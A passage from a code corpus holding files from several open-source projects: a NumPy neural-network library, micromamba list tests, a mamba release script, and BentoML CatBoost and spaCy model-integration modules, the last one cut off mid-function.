return np.apply_along_axis(self._value, axis=0, arr=x_array)
def der(self, x_array):
return np.apply_along_axis(self._derivative, axis=0, arr=x_array)
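# Minimal usage sketch (illustrative only): an ActivationFunction exposes value()
# and der(), both applied column-wise through np.apply_along_axis, e.g.:
# relu = ReLu()
# relu.value(np.array([[-1.0, 2.0]]))  # -> array([[0., 2.]])
# relu.der(np.array([[-1.0, 2.0]]))    # -> array([[0., 1.]])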
class ReLu(ActivationFunction):
@staticmethod
def _relu_value(x_array): return x_array.clip(0.0)
@staticmethod
def _relu_derivative(x_array): return 1. * (x_array.clip(0.0) != 0.0)
def __init__(self):
value = ReLu._relu_value
derivative = ReLu._relu_derivative
super().__init__(value, derivative)
def __str__(self):
return "ReLu"
class SoftMax(ActivationFunction):
@staticmethod
def _softmax_value(x_array):
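# Shift by the maximum before exponentiating so the exponentials cannot overflow;
# the softmax output is unchanged by this constant shift.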
C = np.max(x_array)
shifted = x_array - C
exps = np.exp(shifted)
return exps / np.sum(exps)
@staticmethod
def _softmax_derivative(x_array):
x_array_vert = x_array.reshape(-1, 1)
return np.diagflat(x_array_vert) - np.dot(x_array_vert, x_array_vert.T)
def __init__(self):
value = SoftMax._softmax_value
derivative = SoftMax._softmax_derivative
super().__init__(value, derivative)
def __str__(self):
return "Softmax"
class Identity(ActivationFunction):
@staticmethod
def _identity_value(x_array): return x_array
@staticmethod
def _identity_derivative(x_array): return (0 * x_array) + 1.0
def __init__(self):
value = Identity._identity_value
derivative = Identity._identity_derivative
super().__init__(value, derivative)
def __str__(self):
return "Identity"
```
#### File: joml/joml/network.py
```python
import numpy as np
import warnings
from joml.layer import Layer, SoftMaxCrossEntropyOutputLayer
from joml.logger import StdOutLogger, Logger, BenchmarkLogger
from joml.utils import one_hot
class Network:
"""
A `Network` is a collection of `Layer`s that learns a mapping
from an input space to an output space.
A `Network` is defined using an input_size.
`Layer`s can then be stacked in the network using `network.stack`.
Once the `Layer`s are stacked, the output can be defined using `network.output`.
Finally, the `Network` can be trained and tested using `network.train` and `network.test`
on given datasets.
A `Network` can also embed a specific `Logger` to output results to the standard output
or to a CSV file, for example. See `network.with_logger` and the `Logger` classes.
A `Network` can also be constructed from given weight matrices and bias vectors
using the static method `Network.create_from_Ws_and_bs`.
Weights and biases of a network can also be extracted using `network.get_Ws_bs`.
"""
def __init__(self, input_size, name="Simple Network"):
self.layers = []
self.input_size = input_size
self._output_layer = SoftMaxCrossEntropyOutputLayer(size=2)
self.done_constructing = False
self._times_trained = 0
self.batch_size = 32
self.name = name
self.logger = StdOutLogger()
def __str__(self):
string = "=========================\n"
string += f"{self.name}\n"
string += f" - Input size: {self.input_size}\n"
string += f" - # Parameters : {self.get_num_parameters()}\n"
string += f" - Times trained: {self._times_trained}\n"
string += f" - Batch size: {self.batch_size}\n"
string += "\nLayers:\n"
for (i, layer) in enumerate(self.layers):
string += f" - Layer #{i+1}"
string += str(layer)
string += "\n"
string += str(self._output_layer)
string += "\n=========================\n"
return string
@staticmethod
def create_from_Ws_and_bs(Ws: list, bs: list):
"""
Creates a network from a list of weights and biases.
Each `Layer` is created (in order) from a pair in zip(Ws, bs).
For now, the output layer is a `SoftMaxCrossEntropyOutputLayer`.
:param Ws: list of weights to use in layers
:param bs: list of biases to use in layers
:return: a `Network` with the given architecture
"""
if len(Ws) != len(bs):
raise RuntimeError("Ws and bs don't have the same number of elements:\n"
f"len(Ws) = {len(Ws)} != len(bs)={len(bs)}")
input_size = Ws[0].shape[1]
network = Network(input_size=input_size)
# We keep the last parameters for the output layer
last_W = Ws.pop()
last_b = bs.pop()
previous_layer_size = input_size
packs = zip(Ws, bs)
for W, b in packs:
layer = Layer.from_W_b(previous_layer_size, W, b)
previous_layer_size = layer.size
network.stack(layer)
network._output_layer = SoftMaxCrossEntropyOutputLayer.from_W_b(previous_layer_size, last_W, last_b)
network.done_constructing = True
return network
def with_logger(self, logger: Logger):
"""
Specify a `Logger` to use for the network.
:param logger: the logger to use
:return: the same but modified `Network`
"""
self.logger = logger
return self
def stack(self, layer: Layer):
"""
Stack (append) a layer to the Network
:param layer:
:return: the same `Network` but with this new layer
"""
self.layers.append(layer)
return self
def output(self, output_layer: SoftMaxCrossEntropyOutputLayer):
"""
Specify the output layer to use and initialise the `Network`.
The `Network` can now be trained and test.
:param output_layer: the OutputLayer to use.
:return:
"""
if self.done_constructing:
raise RuntimeError("Network already set: output() called twice")
self._output_layer = output_layer
previous_layer_size = self.input_size
dims = []
for layer in self.layers:
dims.append(layer._initialise(previous_layer_size))
previous_layer_size = layer.size
self._output_layer._initialise(previous_layer_size)
self.done_constructing = True
return self
def train(self, x_train: np.ndarray, y_train: np.ndarray, num_epochs=10, verbose=True):
"""
Train a `Network` using the data provided for a given number of epochs.
An epoch corresponds to a full pass over the dataset.
:param x_train: the inputs to use to train
:param y_train: the labels to use to train
:param num_epochs: the number of epochs for the training
:param verbose: if true, logs progress
:return: the same `Network` but trained one more time
"""
self._prepropagation_check(x_train, y_train)
def printv(t): not verbose or print(t)
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_train.shape) == 1:
x_train = x_train[:, np.newaxis]
y_train = y_train[:, np.newaxis]
n_sample = x_train.shape[1]
printv(f"Training the network for the {self._times_trained+1} time")
for n_epoch in range(1, num_epochs + 1):
printv(f"| Epoch {n_epoch} / {num_epochs}")
accuracy, cost = 0., 0.
for n_b, batch_indices in enumerate(self._batcher(self.batch_size, n_sample)):
x_batch = x_train[:, batch_indices]
y_batch = y_train[:, batch_indices]
y_hat = self._forward_propagation(x_batch)
y_pred = one_hot(y_hat.argmax(axis=0))
accuracy = np.mean(1 * (y_pred == y_batch))
cost = self._output_layer.cost(y_hat, y_batch)
assert y_hat.shape[0] == self._output_layer.size
assert y_batch.shape[0] == self._output_layer.size
self._back_propagation(y_batch)
self._optimize()
self.logger.log_cost_accuracy(n_epoch, cost, accuracy)
self._times_trained += 1
return self
def test(self, x_test: np.ndarray, y_test: np.ndarray, warn=True):
"""
Test a `Network` on the data provided and report the associated accuracy.
:param x_test: the inputs used to test
:param y_test: the labels used to test
:param warn: if true, warn in case of a `Network` not having been trained.
:return: the predictions, the outputs and associated accuracy
"""
self._prepropagation_check(x_test, y_test)
if warn and self._times_trained == 0:
warnings.warn("The network has not been trained yet: results will be fuzzy!")
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_test.shape) == 1:
x_test = x_test[:, np.newaxis]
y_test = y_test[:, np.newaxis]
n_sample = x_test.shape[1]
# Outputs of the networks
y_hat = y_test * 0
for batch_indices in self._batcher(self.batch_size, n_sample):
x_batch = x_test[:, batch_indices]
# Here, we don't persist the results calculated during the forward
# propagation because results are only persisted for training
y_hat[:, batch_indices] = self._forward_propagation(x_batch, persist=False)
# Doing a hard max on the output to find the prediction
y_pred = one_hot(y_hat.argmax(axis=0), num_classes=self._output_layer.size)
accuracy = np.mean(1 * (y_pred == y_test))
return y_pred, y_hat, accuracy
def benchmark(self, x_train: np.ndarray, y_train: np.ndarray, x_test: np.ndarray, y_test: np.ndarray,
num_epochs=10, verbose=True, csv_file_name=None, warn=True):
"""
Benchmark a network. This consists of training a network from scratch with the dataset (x_train, y_train)
and testing it at each iteration with the dataset (x_test, y_test).
An iteration corresponds to the processing of one mini-batch.
This routine can be slow as testing is done at each iteration.
A `BenchmarkLogger` is updated with the logs of the benchmark and can be then used to plot
the results.
:param x_train: the inputs to use for the training
:param y_train: the labels to use for the training
:param x_test: the inputs to use for the testing
:param y_test: the labels to use for the testing
:param num_epochs: the number of epochs to perform
:param verbose: if true, logs progress
:param csv_file_name: the csv file to use to persist the log
:param warn: if true, warns about the network being already trained
:return: a `BenchmarkLogger` containing logs of the benchmark
"""
self._prepropagation_check(x_train, y_train)
def printv(t): not verbose or print(t)
if warn and self._times_trained > 0:
warnings.warn("The network has already been trained: results might not be representative for the benchmark")
# If the dataset only consists of one example, it is represented as a vector
# If it is the case, we change it to be a matrix so that the processing is the same
if len(x_train.shape) == 1:
x_train = x_train[:, np.newaxis]
y_train = y_train[:, np.newaxis]
n_sample = x_train.shape[1]
printv(f"Training the network for the {self._times_trained+1} time")
logger = BenchmarkLogger(csv_file_name=csv_file_name)
for n_epoch in range(1, num_epochs + 1):
printv(f"| Epoch {n_epoch} / {num_epochs}")
train_cost, test_cost, train_acc, test_acc = 0,0,0,0
for n_b, batch_indices in enumerate(self._batcher(self.batch_size, n_sample)):
x_batch = x_train[:, batch_indices]
y_batch = y_train[:, batch_indices]
y_hat = self._forward_propagation(x_batch)
y_pred = one_hot(y_hat.argmax(axis=0))
train_acc = np.mean(1 * (y_pred == y_batch))
train_cost = self._output_layer.cost(y_hat, y_batch)
assert y_hat.shape[0] == self._output_layer.size
assert y_batch.shape[0] == self._output_layer.size
self._back_propagation(y_batch)
self._optimize()
y_pred_test, y_hat_test, test_acc = self.test(x_test, y_test, warn=False)
test_cost = self._output_layer.cost(y_hat_test, y_test)
logger.benchmark_log(train_cost=train_cost, train_acc=train_acc, test_cost=test_cost, test_acc=test_acc)
print("Training Cost:", train_cost)
print("Testing Cost:", test_cost)
print("Training Accuracy:", train_acc)
print("Testing Accuracy:", test_acc)
return logger
def get_Ws_bs(self) -> (list, list):
"""
:return: a tuple of the list of weights and the list of biases of the `Network`.
"""
if not self.done_constructing:
raise RuntimeError("The Network has not been completely constructed yet.")
Ws = []
bs = []
for l in self.layers:
Ws.append(l.W)
bs.append(l.b)
Ws.append(self._output_layer.W)
bs.append(self._output_layer.b)
return Ws, bs
def get_dWs_dbs(self) -> (list, list):
"""
:return: a tuple of two lists : one of the last gradients of weights, the other for the biases
"""
if not self.done_constructing:
raise RuntimeError("The Network has not been completely constructed yet.")
d_Ws = []
d_bs = []
for l in self.layers:
d_Ws.append(l._get_d_W())
d_bs.append(l._get_d_b())
d_Ws.append(self._output_layer._get_d_W())
d_bs.append(self._output_layer._get_d_b())
return d_Ws, d_bs
def get_num_parameters(self)->int:
"""
:return: the total number of parameters in the network
"""
num_parameters = 0
for layer in self.layers:
num_parameters += layer.get_num_parameters()
num_parameters += self._output_layer.get_num_parameters()
return num_parameters
# =============== #
# Private methods #
# =============== #
@staticmethod
def _batcher(batch_size, n_samples, shuffle=True):
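# Yields arrays of sample indices that cover all n_samples in mini-batches of
# size batch_size (the last batch may be smaller); indices are shuffled by default.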
n_batches = n_samples // batch_size
n_batches += 1 * (n_samples % batch_size != 0)
indices = np.arange(n_samples)
if shuffle:
np.random.shuffle(indices)
for i in range(n_batches):
start_batch = i * batch_size
end_batch = min(n_samples, (i + 1) * batch_size)
yield indices[start_batch:end_batch]
def _prepropagation_check(self, x_array: np.ndarray, y_array: np.ndarray):
if not self.done_constructing:
raise RuntimeError("Network not yet initialised : define output layer using output()")
# Checking samples consistency
have_one_sample = (len(x_array.shape) == 1 and len(y_array.shape) == 1)
have_same_number_samples = have_one_sample or x_array.shape[1] == y_array.shape[1]
assert have_same_number_samples
# Checking dimensions consistency
assert (x_array.shape[0] == self.input_size)
assert (y_array.shape[0] == self._output_layer.size)
def _forward_propagation(self, inputs: np.ndarray, persist=True) -> np.ndarray:
x_array = inputs
for layer in self.layers:
x_array = layer._forward_propagate(x_array, persist=persist)
y_hat = self._output_layer._forward_propagate(x_array, persist=persist)
# Test the consistency w.r.t samples
# Some boilerplate code here as we need to check both the case of
# a single vector (only one sample) and the case of a matrix (multiple samples)
have_one_sample = (len(y_hat.shape) == 1 and len(inputs.shape) == 1)
have_same_number_samples = have_one_sample or y_hat.shape[1] == inputs.shape[1]
assert have_same_number_samples
assert (y_hat.shape[0] == self._output_layer.size)
return y_hat
def _back_propagation(self, y: np.ndarray):
W_T_l, delta_l = self._output_layer._back_propagate(y)
for layer in reversed(self.layers):
assert (W_T_l.shape[0] == layer.size)
W_T_l, delta_l = layer._back_propagate(W_T_l, delta_l)
def _optimize(self):
self._output_layer._optimize()
for layer in self.layers:
layer._optimize()
``` |
{
"source": "jjerphan/mamba",
"score": 2
} |
#### File: micromamba/tests/test_list.py
```python
import json
import os
import re
import shutil
import subprocess
import pytest
from .helpers import create, get_env, get_umamba, random_string, umamba_list
class TestList:
env_name = random_string()
root_prefix = os.environ["MAMBA_ROOT_PREFIX"]
current_prefix = os.environ["CONDA_PREFIX"]
prefix = os.path.join(root_prefix, "envs", env_name)
@classmethod
def setup_class(cls):
create("xtensor=0.18", "-n", TestList.env_name, "--json", no_dry_run=True)
os.environ["CONDA_PREFIX"] = TestList.prefix
@classmethod
def teardown_class(cls):
os.environ["CONDA_PREFIX"] = TestList.current_prefix
shutil.rmtree(get_env(TestList.env_name))
@pytest.mark.parametrize("quiet_flag", ["", "-q", "--quiet"])
@pytest.mark.parametrize("env_selector", ["", "name", "prefix"])
def test_list(self, env_selector, quiet_flag):
if env_selector == "prefix":
res = umamba_list("-p", TestList.prefix, "--json", quiet_flag)
elif env_selector == "name":
res = umamba_list("-n", TestList.env_name, "--json", quiet_flag)
else:
res = umamba_list("--json", quiet_flag)
assert len(res) > 2
names = [i["name"] for i in res]
assert "xtensor" in names
assert "xtl" in names
@pytest.mark.parametrize("env_selector", ["name", "prefix"])
def test_not_existing(self, env_selector):
if env_selector == "prefix":
cmd = (
"-p",
os.path.join(TestList.root_prefix, "envs", random_string()),
"--json",
)
elif env_selector == "name":
cmd = ("-n", random_string(), "--json")
with pytest.raises(subprocess.CalledProcessError):
umamba_list(*cmd)
def test_not_environment(self):
with pytest.raises(subprocess.CalledProcessError):
umamba_list(
"-p", os.path.join(TestList.root_prefix, "envs"), "--json",
)
@pytest.mark.parametrize("quiet_flag", ["", "-q", "--quiet"])
def test_regex(self, quiet_flag):
full_res = umamba_list("--json")
names = sorted([i["name"] for i in full_res])
filtered_res = umamba_list("\\**", "--json", quiet_flag)
filtered_names = sorted([i["name"] for i in filtered_res])
assert filtered_names == names
filtered_res = umamba_list("^xt", "--json", quiet_flag)
filtered_names = sorted([i["name"] for i in filtered_res])
assert filtered_names == ["xtensor", "xtl"]
```
#### File: jjerphan/mamba/releaser.py
```python
import copy
import datetime
import re
template = {"version": None, "changes": []}
templates = {
"libmamba": "libmamba/include/mamba/version.hpp.tmpl",
"micromamba": "micromamba/src/version.hpp.tmpl",
"libmambapy": "libmambapy/libmambapy/_version.py.tmpl",
"mamba": "mamba/mamba/_version.py.tmpl",
}
def apply_changelog(name, version, changes):
res = ""
today = datetime.date.today()
fmt_today = today.strftime("%B %d, %Y")
header_line = f"{name} {version} ({fmt_today})"
res += f"{header_line}\n{'=' * len(header_line)}\n\n"
for idx, c in enumerate(changes):
if c.startswith("-"):
if idx > 0 and not changes[idx - 1].startswith("- "):
res += f"\n{c}\n"
else:
res += f"{c}\n"
else:
res += f"{c}\n"
res += "\n"
cl_file = name + "/CHANGELOG.md"
with open(cl_file, "r") as fi:
prev_cl = fi.read()
with open(cl_file, "w") as fo:
fo.write(res + prev_cl)
version_major, version_minor, version_patch = version.split(".")
def template_substitute(contents):
x = contents.replace("{{ version_major }}", version_major)
x = x.replace("{{ version_minor }}", version_minor)
x = x.replace("{{ version_patch }}", version_patch)
return x
if name in templates:
template = templates[name]
with open(template, "r") as fi:
final = template_substitute(fi.read())
with open(template[: -len(".tmpl")], "w") as fo:
fo.write(final)
def commands(changes):
print("pre-commit run --all")
print("git diff")
commit_msg = ", ".join([f"{x} {changes[x]['version']}" for x in changes])
today = datetime.date.today()
date_stamp = today.strftime("%Y.%m.%d")
files_to_commit = ""
for c in changes:
files_to_commit += f" {c}/CHANGELOG.md \\\n"
files_to_commit += f" {templates[c][:-len('.tmpl')]} \\\n"
files_to_commit = files_to_commit[:-3]
print(f"git commit -m 'release {commit_msg}' \\\n{files_to_commit}")
print(f"git tag {date_stamp}")
for c in changes:
print(f"git tag {c}_{changes[c]['version']}")
class Section:
def __init__(self):
self.items = []
self.applies_to = ["all"]
self.text = ""
class Item:
def __init__(self):
self.applies_to = ["all"]
self.text = ""
def populate_changes(name, sections, changes):
el = changes[name]
def applies(x):
return "all" in x or name in x
for s in sections:
s_applies = applies(s.applies_to)
if s_applies and len(s.items):
s_applies = any(applies(i.applies_to) for i in s.items)
if s_applies:
if s != sections[0]:
el["changes"].append("\n" + s.text.strip())
else:
el["changes"].append(s.text.strip())
for i in s.items:
if applies(i.applies_to):
el["changes"].append(f"- {i.text.strip()}")
def main():
changes = {}
with open("CHANGELOG.md", "r") as fi:
contents = fi.readlines()
for idx, line in enumerate(contents):
if line.startswith("====="):
release_start = idx + 1
break
brackets_re = re.compile(r"\[(.*)\]")
# section with groups, heading + items
sections = []
in_section = False
contents = contents[release_start:]
for idx, c in enumerate(contents):
if c.startswith("Releases"):
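# A release header line has the form "Releases: <name> <version>, <name> <version>, ...";
# record a changelog template and target version for each listed component.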
releases = [x.strip() for x in c[len("Releases: ") :].split(",")]
for r in releases:
rsplit = r.split()
changes[rsplit[0].strip()] = copy.deepcopy(template)
changes[rsplit[0].strip()]["version"] = rsplit[1].strip()
continue
if contents[idx + 1].startswith("===="):
break
if c.strip() == "" or c[0] == "-":
in_section = False
if c.strip() == "":
continue
if c[0] != "-":
if not in_section:
sections.append(Section())
in_section = True
sections[-1].text += c
if m := re.search(brackets_re, c):
if in_section:
sections[-1].applies_to = [x.strip() for x in m.groups(1)[0].split(",")]
else:
sections[-1].items.append(Item())
sections[-1].items[-1].text = c[m.end() :].strip()
sections[-1].items[-1].applies_to = [
x.strip() for x in m.groups(1)[0].split(",")
]
else:
if c.startswith(" "):
if in_section:
sections[-1].text += " " + c.strip()
else:
sections[-1].items[-1].text += c.strip()
else:
if not in_section:
sections[-1].items.append(Item())
sections[-1].items[-1].text = c.strip()
sections[-1].items[-1].applies_to = ["all"]
for c in changes:
populate_changes(c, sections, changes)
for el in changes:
apply_changelog(el, changes[el]["version"], changes[el]["changes"])
commands(changes)
if __name__ == "__main__":
main()
``` |
{
"source": "jjerphan/pils",
"score": 3
} |
#### File: pils/pils/settings.py
```python
import os
# Folders structures
HERE = os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir))
ROOT = os.path.join(HERE, os.pardir)
PROBLEMS_FOLDER = os.path.join(HERE, "problems")
BIN_FOLDER = os.path.join(HERE, "bin")
TEMP_FOLDER = os.path.join(HERE, "temp")
def clean_lines(lines):
return list(map(lambda f: f.replace("\n", ""), lines))
``` |
{
"source": "jjerphan/py2puml",
"score": 3
} |
#### File: withsubdomain/subdomain/insubdomain.py
```python
def horsepower_to_kilowatt(horsepower: float) -> float:
return horsepower * 0.7457  # 1 horsepower is about 745.7 W, i.e. 0.7457 kW
class Engine(object):
horsepower: int
class Pilot(object):
name: str
``` |
{
"source": "jjerry-k/BentoML",
"score": 2
} |
#### File: _internal/frameworks/catboost.py
```python
import typing as t
from typing import TYPE_CHECKING
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Model
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..utils import LazyLoader
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
import numpy as np
from pandas.core.frame import DataFrame
from ..models import ModelStore
else:
np = LazyLoader("np", globals(), "numpy")
try:
import catboost as cbt
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""catboost is required in order to use module `bentoml.catboost`, install
catboost with `pip install catboost`. For more information, refers to
https://catboost.ai/docs/concepts/python-installation.html
"""
)
MODULE_NAME = "bentoml.catboost"
# TODO: support cbt.Pool runner io container
CATBOOST_EXT = "cbm"
def _get_model_info(
tag: Tag,
model_params: t.Optional[t.Dict[str, t.Union[str, int]]],
model_store: "ModelStore",
) -> t.Tuple["Model", str, t.Dict[str, t.Any]]:
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
model_file = model.path_of(f"{SAVE_NAMESPACE}.{CATBOOST_EXT}")
_model_params: t.Dict[str, t.Union[str, int]] = (
dict() if not model_params else model_params
)
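# Merge in options recorded at save() time without overriding caller-supplied values.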
for key, value in model.info.options.items():
if key not in _model_params:
_model_params[key] = value # pragma: no cover
return model, model_file, _model_params
def _load_helper(
model_file: str, model_params: t.Optional[t.Dict[str, t.Union[str, int]]]
) -> t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
]:
if model_params is not None:
model_type = model_params["model_type"]
if model_type == "classifier":
model = cbt.core.CatBoostClassifier()
elif model_type == "regressor":
model = cbt.core.CatBoostRegressor()
else:
model = cbt.core.CatBoost()
else:
model = cbt.core.CatBoost()
_m: t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
] = model.load_model(model_file)
return _m
@inject
def load(
tag: t.Union[str, Tag],
model_params: t.Optional[t.Dict[str, t.Union[str, int]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> t.Union[
cbt.core.CatBoost, cbt.core.CatBoostClassifier, cbt.core.CatBoostRegressor
]:
"""
Load a CatBoost model from BentoML local modelstore with given name.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`): Parameters for
a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`Union[catboost.core.CatBoost, catboost.core.CatBoostClassifier, catboost.core.CatBoostRegressor]`: one of :code:`catboost.core.CatBoostClassifier`,
:code:`catboost.core.CatBoostRegressor` or :code:`catboost.core.CatBoost` from BentoML modelstore.
Examples:
.. code-block:: python
import bentoml
booster = bentoml.catboost.load("my_model:latest", model_params=dict(model_type="classifier"))
""" # noqa
_, _model_file, _model_params = _get_model_info(tag, model_params, model_store)
return _load_helper(_model_file, _model_params)
@inject
def save(
name: str,
model: t.Union[
cbt.core.CatBoost,
cbt.core.CatBoostClassifier,
cbt.core.CatBoostRegressor,
],
*,
model_params: t.Optional[t.Dict[str, t.Union[str, t.Any]]] = None,
model_export_parameters: t.Optional[t.Dict[str, t.Any]] = None,
model_pool: t.Optional["cbt.core.Pool"] = None,
metadata: t.Union[None, t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (:code:`Union[catboost.core.CatBoost, catboost.core.CatBoostClassifier, catboost.CatBoostRegressor]`):
Instance of model to be saved
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`):
Parameters for a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
model_export_parameters (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`):
Export parameters for given model.
model_pool (:code:`cbt.core.Pool`, `optional`, default to :code:`None`):
CatBoost data pool for given model.
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.types.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
from sklearn.datasets import load_breast_cancer
import catboost as cbt
# read in data
cancer = load_breast_cancer()
X = cancer.data
y = cancer.target
# create and train model
model = cbt.CatBoostClassifier(iterations=2,
depth=2,
learning_rate=1,
loss_function='Logloss',
verbose=True)
model.fit(X, y)
...
tag = bentoml.catboost.save("my_catboost_model", model, model_params=dict(model_type="classifier"))
# load the booster back:
loaded = bentoml.catboost.load("my_catboost_model:latest")
# or:
loaded = bentoml.catboost.load(tag)
""" # noqa
if not model_params:
model_params = {}
if "model_type" not in model_params:
model_params["model_type"] = "classifier"
context = {
"framework_name": "catboost",
"pip_dependencies": [f"catboost=={get_pkg_version('catboost')}"],
}
_model = Model.create(
name,
module=MODULE_NAME,
options=model_params,
metadata=metadata,
context=context,
)
path = _model.path_of(f"{SAVE_NAMESPACE}.{CATBOOST_EXT}")
format_ = CATBOOST_EXT
model.save_model(
path,
format=format_,
export_parameters=model_export_parameters,
pool=model_pool,
)
_model.save(model_store)
return _model.tag
class _CatBoostRunner(Runner):
@inject
def __init__(
self,
tag: Tag,
predict_fn_name: str,
model_params: t.Optional[t.Dict[str, t.Union[str, int]]],
name: str,
resource_quota: t.Optional[t.Dict[str, t.Any]],
batch_options: t.Optional[t.Dict[str, t.Any]],
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
):
model_info, model_file, _model_params = _get_model_info(
tag, model_params, model_store
)
super().__init__(name, resource_quota, batch_options)
self._model_info = model_info
self._model_file = model_file
self._predict_fn_name = predict_fn_name
self._model_params = _model_params
@property
def required_models(self) -> t.List[Tag]:
return [self._model_info.tag]
@property
def num_concurrency_per_replica(self) -> int:
return 1
@property
def num_replica(self) -> int:
return int(round(self.resource_quota.cpu))
# pylint: disable=attribute-defined-outside-init
def _setup(self) -> None:
self._model = _load_helper(self._model_file, self._model_params)
self._predict_fn = getattr(self._model, self._predict_fn_name)
# pylint: disable=arguments-differ
def _run_batch( # type: ignore[reportIncompatibleMethodOverride]
self,
inputs: t.Union["np.ndarray[t.Any, np.dtype[t.Any]]", "DataFrame", cbt.Pool],
) -> "np.ndarray[t.Any, np.dtype[t.Any]]":
res = self._predict_fn(inputs)
return np.asarray(res)
@inject
def load_runner(
tag: t.Union[str, Tag],
predict_fn_name: str = "predict",
*,
model_params: t.Union[None, t.Dict[str, t.Union[str, int]]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
name: t.Optional[str] = None,
resource_quota: t.Union[None, t.Dict[str, t.Any]] = None,
batch_options: t.Union[None, t.Dict[str, t.Any]] = None,
) -> "_CatBoostRunner":
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. `bentoml.catboost.load_runner` implements a Runner class that
wraps around a CatBoost model, which optimizes it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
predict_fn_name (:code:`str`, default to :code:`predict`):
Options for inference functions. `predict` is the default function.
model_params (:code:`Dict[str, Union[str, Any]]`, `optional`, default to :code:`None`): Parameters for
a CatBoost model. Following parameters can be specified:
- model_type(:code:`str`): :obj:`classifier` (`CatBoostClassifier`) or :obj:`regressor` (`CatBoostRegressor`)
resource_quota (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure resources allocation for runner.
batch_options (:code:`Dict[str, Any]`, default to :code:`None`):
Dictionary to configure batch options for runner in a service context.
model_store (:mod:`~bentoml._internal.models.store.ModelStore`, default to :mod:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for :mod:`bentoml.catboost` model
Examples:
.. code-block:: python
import catboost as cbt
import pandas as pd
input_data = pd.read_csv("/path/to/csv")
runner = bentoml.catboost.load_runner("my_model:latest")
runner.run(cbt.Pool(input_data))
""" # noqa
tag = Tag.from_taglike(tag)
if name is None:
name = tag.name
return _CatBoostRunner(
tag=tag,
predict_fn_name=predict_fn_name,
model_params=model_params,
model_store=model_store,
name=name,
resource_quota=resource_quota,
batch_options=batch_options,
)
```
#### File: _internal/frameworks/spacy.py
```python
import os
import sys
import typing as t
import logging
import importlib
from typing import TYPE_CHECKING
from pathlib import Path
from functools import partial
from distutils.dir_util import copy_tree
import yaml
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Model
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..utils import LazyLoader
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..bento.pip_pkg import split_requirement
from ..bento.pip_pkg import packages_distributions
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING: # pragma: no cover
from spacy.vocab import Vocab
from thinc.config import Config
from spacy.tokens.doc import Doc
from ..models import ModelStore
if sys.version_info >= (3, 8):
from typing import Literal
else: # pragma: no cover
from typing_extensions import Literal
try:
import spacy
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""\
`spacy` is required to use with `bentoml.spacy`.
Instruction: Refers to https://spacy.io/usage for more information.
"""
)
MODULE_NAME = "bentoml.spacy"
util = LazyLoader("util", globals(), "spacy.util")
thinc_util = LazyLoader("thinc_util", globals(), "thinc.util")
thinc_backends = LazyLoader("thinc_backends", globals(), "thinc.backends")
torch = LazyLoader("torch", globals(), "torch")
tensorflow = LazyLoader("tensorflow", globals(), "tensorflow")
_TORCH_TF_WARNING = """\
It is recommended that you also have `{package}` installed
if you want to run SpaCy with a {framework} model.
Refer to {link} for more information.
We also detected that you chose to run on GPUs; in order to utilize
BentoML Runners features with GPUs you should also install `{package}` with
CUDA support.
""" # noqa
PROJECTS_CMD_NOT_SUPPORTED = [
"assets",
"document",
"dvc",
"push",
"run",
]
logger = logging.getLogger(__name__)
@inject
def load_project(
tag: Tag,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> str:
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
if "projects_uri" in model.info.options:
logger.warning(
